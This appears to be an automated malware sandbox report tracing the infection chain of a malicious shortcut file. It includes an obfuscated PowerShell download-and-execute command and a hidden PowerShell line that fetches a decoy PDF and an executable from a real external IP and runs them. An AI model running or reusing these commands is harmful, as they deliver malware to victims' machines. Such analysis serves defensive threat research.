                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: String function: 00435350 appears 80 times
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 320
                      Source: 123123213123123321132.exe, 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155178518.0000000000CB9000.00000040.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2123313001.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2119310609.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                      Source: 123123213123123321132.exe, 123123213123123321132.exe, 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155178518.0000000000CB9000.00000040.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2123313001.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2119310609.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                      Source: classification engineClassification label: mal100.troj.evad.winLNK@78/334@10/14
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004F9340 CoCreateInstance,19_2_004F9340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-47c6bd2c-b184-e8d685-d520ae930867}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6432
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axyw1eo4.ley.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\loader.bat" "
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: Readme.lnk.download.lnkReversingLabs: Detection: 21%
                      Source: 123123213123123321132.exeString found in binary or memory: ms-help:
                      Source: 123123213123123321132.exeString found in binary or memory: ms-help:
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\loader.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\readme.pdf
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user\AppData\Local\Temp\readme.pdf"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2128,i,2616988406370939895,15394173606116148119,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6404 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:6
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6672 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6760 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7632 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7632 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe "C:\Users\user\AppData\Local\Temp\123123213123123321132.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=2100,i,965329265316757601,16489073601455503628,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2040,i,9689518798590709034,10875884163289522825,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess created: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe "C:\Users\user\AppData\Local\Temp\123123213123123321132.exe"
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 320
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6432 -s 140
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6740 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\loader.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\readme.pdf Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe "C:\Users\user\AppData\Local\Temp\123123213123123321132.exe" Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2128,i,2616988406370939895,15394173606116148119,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6404 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:6Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6672 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6760 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7632 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7632 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6740 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess created: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe "C:\Users\user\AppData\Local\Temp\123123213123123321132.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=2100,i,965329265316757601,16489073601455503628,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2040,i,9689518798590709034,10875884163289522825,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
